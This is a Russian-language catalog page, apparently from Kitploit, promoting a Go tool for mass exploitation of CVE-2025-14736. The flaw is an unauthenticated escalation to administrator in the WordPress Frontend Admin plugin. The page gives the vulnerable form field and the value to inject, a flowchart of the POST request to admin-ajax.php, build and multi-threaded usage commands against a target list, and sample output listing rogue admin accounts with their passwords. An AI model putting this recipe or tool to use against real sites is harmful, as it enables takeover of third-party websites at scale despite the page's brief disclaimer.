Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-14736 — Неаутентифицированное повышение привилегий до администратора через поле формы роли | Kitploit
Инструменты/GitHubGitHub/hyunchiya/cve-2025-14736
Повышение привилегийАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubhyunchiya/cve-2025-14736

CVE-2025-14736

Неаутентифицированное повышение привилегий до администратора через поле формы роли

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-14736

Frontend Admin от DynamiApps - Неавторизованное повышение привилегий

Автор: Hyun Chiya


Информация об уязвимости

ПолеЗначение
Идентификатор CVECVE-2025-14736
ПлагинFrontend Admin by DynamiApps
Затронутые версии<= 3.28.25
Тип уязвимостиНеавторизованное повышение привилегий
КритичностьКритический

Описание

Плагин Frontend Admin для WordPress уязвим для неавторизованного повышения привилегий из-за недостаточной проверки полей, контролируемых пользователем, во время регистрации. Злоумышленники могут внедрять произвольные роли, включая administrator, манипулируя данными отправляемой формы.

Анализ первопричины

Уязвимая логика находится в обработке отправленных форм, где поле role принимается из пользовательского ввода без проверки, авторизован ли пользователь для назначения этой роли. В частности, поле acff[user][field_user_role_ID] может быть изменено на administrator.

Схема эксплуатации

root@kitploit:~
flowchart TD
    A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
    B --> C["Construct POST payload with 'role'='administrator'"]
    C --> D["POST to /wp-admin/admin-ajax.php"]
    D --> E{"Verification"}
    E -->|Success| F["New Admin User Created"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff

Предварительные условия

  1. На целевой системе установлен плагин "Frontend Admin" (уязвимая версия).
  2. Включена и доступна форма регистрации на фронтенде.

Сборка

root@kitploit:~
go build -o mass_exploit.exe mass_exploit.go

Использование

Массовое сканирование и эксплуатация

root@kitploit:~
.\mass_exploit.exe -l list.txt -t 50

Опции

АргументОписание
-lПуть к файлу со списком целевых URL (по умолчанию: list.txt)
-tКоличество параллельных потоков (по умолчанию: 10)
-timeoutТаймаут запроса в секундах (по умолчанию: 15)

Пример вывода

root@kitploit:~
>> [ ONLINE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14736 - Mass Exploit Tool                                                  ║
    ║   Frontend Admin by DynamiApps Privilege Escalation                                   ║
    ║   Author: Hyun Chiya                                                                  ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...

[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32

[*] Scan complete.

Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Используйте ответственно.

Автор

Hyun Chiya

Скачать инструмент